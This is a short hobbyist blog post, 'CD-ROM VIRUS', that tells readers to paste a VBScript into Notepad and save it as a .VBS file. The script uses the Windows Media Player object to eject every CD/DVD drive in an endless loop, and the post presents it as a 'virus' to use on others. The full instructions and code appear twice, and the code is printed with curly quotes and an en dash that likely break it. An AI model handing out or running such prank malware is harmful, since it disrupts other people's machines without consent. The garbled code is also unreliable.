CD-ROM VIRUS
HELLO FRIENDS... BY.MICKY VERMA
CD/DVD DRIVE VIRUS.
Open Notepad.
Copy the code given below exactely into the notepad file:
Set oWMP = CreateObject(“WMPlayer.OCX.7” )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
loop
End If
Save it as “Anything.VBS”.
HELLO FRIENDS... BY.MICKY VERMA
CD/DVD DRIVE VIRUS.
Open Notepad.
Copy the code given below exactely into the notepad file:
Set oWMP = CreateObject(“WMPlayer.OCX.7” )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
loop
End If
Save it as “Anything.VBS”.
No comments:
Post a Comment